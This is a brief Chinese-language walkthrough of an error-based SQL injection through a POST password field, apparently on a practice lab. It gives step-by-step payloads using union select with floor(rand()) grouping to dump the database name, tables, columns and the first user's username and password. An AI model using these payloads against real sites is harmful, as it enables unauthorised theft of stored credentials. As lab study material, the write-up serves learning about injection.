POST型的 双注入
0X01随便测试一下
在password输入"会报错 "#就不报错了 那么应该是“”的闭合
但是没有回显的值 只有报错的信息 那我们是不是该考虑从报错的语句里面来得到我们的答案
0X02爱之初实验
爆库名
" union select count(*),concat_ws('*',(select database()),floor(rand()*2)) as a from information_schema.tables group by a#
有数据库后 开始爆破表名
" union select count(*),concat_ws(';',(select table_name from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a#
limit绕吧 这是不是个数问题 不能用group绕
" union select count(*),concat_ws(';',(select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
得到表名后
爆列名
" union select count(*),concat_ws(';',(select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
last 爆破字段 --第一个用户名和密码
" union select count(*),concat_ws(',',(select username from users limit 0,1),(select password from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#